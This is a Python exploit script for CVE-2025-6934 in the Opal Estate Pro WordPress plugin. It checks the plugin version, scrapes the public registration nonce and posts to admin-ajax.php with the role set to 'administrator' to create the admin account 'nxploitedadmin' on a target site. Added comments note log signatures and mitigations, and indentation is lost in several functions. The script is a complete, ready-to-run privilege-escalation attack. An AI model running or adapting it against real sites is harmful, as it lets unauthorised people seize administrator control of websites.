import argparse
import requests
import re
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import json
# By: Khaled_alenazi (Nxploited)
# Silences urllib3's warnings, including the InsecureRequestWarning that
# requests raises for the verify=False calls further down.
requests.packages.urllib3.disable_warnings()
# Fixed User-Agent sent with every request that passes headers=headers.
# The value is a generic browser prefix with no engine or browser token after
# the platform part, so in access logs it is a weak indicator on its own.
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
headers = {"User-Agent": user_agent}
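def check_version(base_url):
    """Print whether the plugin readme under *base_url* advertises an affected version.

    Requests ``/wp-content/plugins/opal-estate-pro/readme.txt``, extracts the
    ``Stable tag:`` value and compares it, component by component, with 1.7.5
    (the highest version this script treats as affected). Every outcome is
    printed; the function returns ``None`` and does not raise for ordinary
    request or parsing errors.

    The stable tag is a fingerprint, not proof: it is whatever the readme on
    disk says, so a hit should be confirmed against the installed plugin
    version before it is acted on.
    """
    readme_url = urljoin(base_url, "/wp-content/plugins/opal-estate-pro/readme.txt")
    try:
        # verify=False skips TLS certificate validation, so the response is
        # not authenticated; treat the result as a hint only.
        response = requests.get(readme_url, verify=False, timeout=10)
        if response.status_code != 200:
            print(" [-] Could not access readme.txt")
            return

        match = re.search(r"Stable tag:\s*([\d\.]+)", response.text)
        # The pattern also accepts a run of dots, which carries no version.
        parts = [int(p) for p in match.group(1).split(".") if p] if match else []
        if not parts:
            print(" [-] Stable tag not found in readme.txt")
            return
        version = match.group(1)

        # Compare numerically: as strings, "1.10.0" sorts before "1.7.5" and
        # would be reported as affected. Trailing zeros are dropped so that
        # "1.7.5.0" compares equal to "1.7.5".
        while parts and parts[-1] == 0:
            parts.pop()

        print("\n[•] Plugin Version Check:")
        if tuple(parts) <= (1, 7, 5):
            print(f" [+] Vulnerable version detected: {version}")
        else:
            print(f" [-] Version may not be vulnerable: {version}")
    except Exception as e:
        print(f" [-] Error: {e}")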
# Fetch the page at base_url and return the "value" attribute of the <input>
# named "opalestate-register-nonce"; return None when the field is absent or
# when the request or parsing fails.
# The request carries no session cookie or credentials, so a nonce obtained
# this way cannot act as an authorisation check on the registration endpoint.
def get_nonce(base_url):
try:
# verify=False: the TLS certificate is not validated for this request.
response = requests.get(base_url, verify=False, timeout=10, headers=headers)
soup = BeautifulSoup(response.text, "html.parser")
input_tag = soup.find("input", {"name": "opalestate-register-nonce"})
if input_tag:
return input_tag.get("value")
else:
return None
# NOTE(review): a bare except also swallows KeyboardInterrupt and SystemExit
# and hides the failure reason; `except Exception` with a printed message
# would match the error handling used in the other functions of this file.
except:
return None
# Submit the plugin's registration form through admin-ajax.php with a
# client-chosen "role" value and print the outcome. Returns None.
#
# The request can only succeed if the server-side handler for the action
# "opalestate_register_form" honours the posted role instead of assigning a
# fixed default; that is presumably the flaw tracked as CVE-2025-6934, the
# identifier this script names in its argparse description.
#
# Defender notes:
# - Log signature: POST to /wp-admin/admin-ajax.php whose body carries
#   action=opalestate_register_form together with a role field.
# - Account artefact: the username is hard-coded as "nxploitedadmin"; audit
#   the user table for it and for any administrator created by self-registration.
# - Mitigation: the registration handler must ignore or allow-list the role
#   server-side. Where the plugin is at or below 1.7.5 (the threshold this
#   script checks), update it if a later release exists, or disable the
#   plugin or its registration form.
def exploit(base_url, email, password):
print("\n[•] Exploit Attempt Started")
# The nonce is read from the public page at base_url, without authentication.
nonce = get_nonce(base_url)
if not nonce:
print(" [-] Failed to retrieve nonce")
return
print(f" [+] Nonce Found: {nonce}")
target = urljoin(base_url, "/wp-admin/admin-ajax.php")
# Form fields as posted; "role" is the security-relevant one, because it is
# supplied by the client rather than decided by the server.
data = {
"username": "nxploitedadmin",
"email": email,
"password": password,
"password1": password,
"role": "administrator",
"confirmed_register": "on",
"opalestate-register-nonce": nonce,
"_wp_http_referer": "/",
"ajax": "1",
"action": "opalestate_register_form"
}
try:
# verify=False: the TLS certificate is not validated for this request.
response = requests.post(target, data=data, verify=False, headers=headers)
print(f" [+] HTTP Status: {response.status_code}")
try:
result = response.json()
# Success is judged only by the JSON "status" flag in the response; the
# script does not confirm that the account exists or which role it received.
if result.get("status") is True:
print("\n[✔] Exploit Successful!")
print(" --------------------------")
print(f" Username : nxploitedadmin")
print(f" Email : {email}")
# NOTE(review): the password is echoed to stdout in clear text.
print(f" Password : {password}")
print(f" Role : administrator")
print(" --------------------------")
else:
print("\n[✖] Exploit Failed!")
message = result.get("message", "")
# The server's message is treated as HTML and reduced to plain text before printing.
clean_msg = BeautifulSoup(message, "html.parser").get_text().strip()
print(f" Reason: {clean_msg}")
except json.JSONDecodeError:
print("\n[✖] Unexpected response (non-JSON):")
print(response.text)
except Exception as e:
print(f" [-] Exploit Error: {e}")
# Credit banner; printed at module level, so it appears on every run or import.
print("\nExploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited")
# Command-line interface: all three options are required.
parser = argparse.ArgumentParser(description="CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)")
parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://site.com/path/)")
parser.add_argument("-mail", "--newmail", required=True, help="Email to register as admin")
# NOTE(review): a password passed as a command-line argument is visible in the
# process list and usually ends up in shell history.
parser.add_argument("-password", "--newpassword", required=True, help="Password for new admin user")
# NOTE(review): there is no `if __name__ == "__main__":` guard, so importing
# this file parses sys.argv and issues the requests below.
args = parser.parse_args()
# The version check is informational only: it returns nothing, and exploit()
# runs whatever it reported.
check_version(args.url)
exploit(args.url, args.newmail, args.newpassword)